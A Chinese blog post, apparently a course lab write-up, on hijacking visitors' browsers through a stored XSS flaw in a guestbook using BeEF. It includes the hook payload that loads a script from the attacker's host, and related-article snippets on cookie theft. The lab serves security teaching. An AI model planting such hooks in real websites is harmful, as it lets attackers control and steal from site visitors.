XSS攻击:利用Beef劫持被攻击者客户端浏览器

已于 2024-06-09 20:59:43 修改
阅读量1.3k 收藏 1
点赞数
分类专栏: 网络渗透测试 文章标签: 安全 web安全
于 2022-11-13 15:32:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzfff__/article/details/127829067
版权

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner)

实验步骤:

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

首先攻击者和被攻击者需要连接同一个网络。

1.攻击者打开kali,打开Windows Server2003,二者都需要设置为桥接模式。

注意要同时设置虚拟网络适配器为桥接模式

2.Windows Server2003中需要把guestbook拉入D盘中,如果拉不进去,可用u盘协助,或下载VMare tools(可以去找找这个怎么下载)。

 3.利用Windows Server2003创建一个网站

找到默认网站,右键选择属性 

 将GuestBook选入

 查看ip

 配置ip

 添加message.asp

 

 打开浏览器,输入服务器ip可看到留言簿网站

4.利用AWVS扫描留言簿网站,发现其存在XSS漏洞

 一直next直到finish

 发现xss漏洞

 5.kali输入beef-xss指令得到恶意代码(如果没安装beef需要先安装,输入beef-xss然后根据提示一直‘y’就好了)

 恶意代码为图中红框部分,用的时候是<script src="http://Kali的IP地址:3000/hook.js"></script>,所以需要查看kali的ip

 输入beef-xss后会弹出一个页面,我们输入账号密码登录进去

6.访问http://留言簿网站/message.asp,将恶意代码写入网站留言板

 如果留言被管理员审核通过,你的留言能在留言板显示出来。当客户端访问服务器的留言板后,你可以在Beef控制端查看目标主机,如果出现下图所示内网,表示客户端浏览器已经被成功劫持。

 7.在Current Browser项选择Browser,点击Hooked Domain选择Redirect Browser,在右边的Redirect URL中输入网址,即可控制浏览器跳转到目标网址

 例如,输入https://www.csdn.net/即可控制受害者的页面跳转到CSDN官网页面

_read_
关注
专栏目录
浏览器攻击框架BeEF Part 2:初始化控制
Fly_鹏程万里
08-22 1219
前言 在上一章,笔者已经介绍了BeEF框架。在这一章,笔者将介绍攻击浏览器技术的第一步:初始控制。 浏览器攻击方法流程 攻击浏览器一般分为几个阶段,看下图: 整个过程分为三个步骤,第一步是初始化控制,第二步是持续控制,第三步是攻击。在第三步中的七个攻击方法是可以交叉的,比如可以同时攻击用户和攻击Web应用。接下来会一章一章的介绍这些内容。这一章介绍初始化控制。 初始化控制 首先在这...
XSS部分:利用Beef劫持攻击者客户端浏览器
m1287578441的博客
12-25 529
1.搭建GustBook网站 选择路径: 后面的权限直接给满就好。 2.用AWVS扫描目标网站,发现其漏洞 3.使用beef生成恶意代码 安装:apt-get install beef-xss 4.访问漏洞网站,将恶意代码写入其留言板 10.21.122.212是kali的地址 5.效果 之后,客户端访问这个服务器的留言板,客户端浏览器就会被劫持 然后,我们可以在Beef控制端查看目标主机,目标主机已经被劫持了。 在beef操控台给被劫持主机发消息 在beef控制被劫持主机浏览器跳转到目标
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
最新发布
wangluoanquan111的博客
08-20 947
✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
安全(三):XSS攻击beef 使用)
天威一号
11-17 961
1、 2、 3、
利用beef劫持客户端浏览器
qq_42853814的博客
01-28 375
Current Browser选择Commands,然后在Browser里面选择Redirect Browser,最后在右边的Redirect URL中输入网址,就可以控制目标浏览器跳转到指定网址了。1.搭建IIS服务器,配置存在XSS漏洞的留言板网站,并利用AWVS(Acunetix Web Vulnerability Scanner 10.0)扫描出该网站存在XSS漏洞。4. 在本机访问这个服务器的留言板,本机的浏览器就会被劫持,接着就可以利用beef控制浏览器跳转到指定网址。3. 客户端(本机)
BeEF-XSS攻击
彭淦淦的博客
05-11 528
2.1 问题 Kali虚拟机(192.168.111.132)搭建BeEF服务 宿主机(192.168.111.1)搭建正常网站 Win2008虚拟机(192.168.111.133)模拟用户被攻击 2.2 步骤 实现此案例需要按照如下步骤进行。 1)kali中运行SEToolkit,输入1回车,如图-11所示 图-11 2)输入4回车,如图-12所示 图-12 3)输入5回车,如图-13所示 图-13 4)配置IP和端口,开始监听,如图-14所示 图-14 5)在
web安全渗透——4(XSS攻击+BeEF
weixin_44826485的博客
02-06 780
一、简介 介绍: XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。关于XSS有关危害,我这里中罗列一段列表,详细介绍不进行更多的赘述: 挂马 盗取用户Cookie。 DOS(拒绝服务)客户端浏览器。 钓鱼攻击,高级的钓鱼技巧。 删除目标文章、恶意篡改数据、嫁祸。 劫持用户Web行为,甚至进一步渗透内网。 爆发Web2.0蠕虫。 蠕虫式的DDoS攻击。 蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数
利用Beef劫持客户端浏览器
weixin_45329009的博客
10-28 1330
利用Beef劫持客户端浏览器 一、环境: 1.Kali(使用beef生成恶意代码,IP:192.168.0.103) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.0.104) 3. 客户端(用于访问web服务器,IP:192.168.0.101) 二、步骤: Kali使用beef生成恶意代码 将恶意代码写入192.168.0.104网站留言板 只要客户端访问这个服务...
【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4555
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
跨站脚本攻击xss利用-beef攻击-演示
jklbnm12的博客
02-09 1041
0x0环境 主机A win10:10.51.20.60(wifi) 主机A中的虚拟机kali攻击者):192.168.110.129(NAT) 主机A中的虚拟机win2003(受害者):192.168.110.132(NAT) 0x1 配置 0x11 beef配置 Beef的配置文件在 /usr/share/beef-xss/config.yaml Host:kali IP Port:beef监听端口默认3000 public:主机A(接入外网的电脑IP) public_port:主机A中空闲的端口,我
利用 BeEF 执行 XSS 攻击的总结
陌生人
05-27 1371
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
E017-渗透测试常用工具-使用Beef客户端浏览器进行劫持.pdf
12-02
E017-渗透测试常用工具-使用Beef客户端浏览器进行劫持
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS(网络安全学习13)
Until_U的博客
07-06 5901
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSS。 XSS是一种经常出现...
20-5 XSS的利用(包含:蓝莲花、beef-xss)
weixin_43263566的博客
01-12 374
存储型XSS是一种特殊类型的XSS攻击攻击者将带有XSS攻击代码的链接放在网页上的某个位置(例如评论框),当用户访问此链接并执行时,攻击者就能获取用户的敏感信息。由于存储型XSS能够攻击所有访问此页面的用户,因此其危害非常大。之后刷新网页或从其他菜单切换到当前url都会触发攻击,出现弹框。那知道了这个机制后我们就开始收集用户的cookie。
利用Beef劫持攻击者客户端浏览器。用DVWA+SQLmap+Mysql进行SQL注入实战。
yellowO的博客
12-24 2010
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;SqlMAP;DVWA实验环境搭建。角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
XSS————反射xss攻击劫持用户浏览器
weixin_43102772的博客
02-28 468
xss攻击劫持用户浏览器, 原理: 用户访问了黑客构建的xss攻击连接,跳转到了恶意的网址并加载了hook.js,从而通过hook.js劫持用户浏览器。 <script> window.onload=function(){ //是window.onload 不是windows.onload var link = document.getElementsByTagName("a")...
安全系列】beef-xss攻击示例
叁滴水 的博客
08-09 5079
beef-xss说明 BeEF是“浏览器开发框架”的缩写。它是一个专注于Web浏览器的渗透测试工具。 ​BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性:Web浏览器BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,并从浏览器上下文中对系统进行进一步攻击。 1.安装beef-xss apt-get install beef-xss Setting
XX攻击——反射型 XSS 攻击劫持用户浏览器
Cwillchris的博客
06-29 334
我们先构建一个反射型的 XSS 攻击跳转到存在漏洞的页面。其实也可以在 DVWA 中直接进行攻击,但是我们处于演示目的构造了一个相对复杂的环境。window.onload = function() {var link=document.getElementsByTagName("a");for(j = 0; j < link.length; j++) {link[j].href="http://www.baidu.com";}}JavaScript 代码分析 window....
xss漏洞以及beef的使用
young‘s blog
07-20 3097
这次的xss漏洞就从dvwa开始吧。 反射型: 先是low级别的,输入1后页面变为 这次尝试一下burpsuite里自带的扫描器。 首先不得不说dvwa设计有一些缺陷,有时候等级改不过去,这就让人很蛋疼,所以还是要自己手动改一下。就因为这个,扫描器一直扫不出来。用了改过之后的包就可以扫描了。上图 可以看到箭头指向的就是payload 看一下返回页面,就是弹框1了。没啥别的。 抓一下返回包看一看 可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值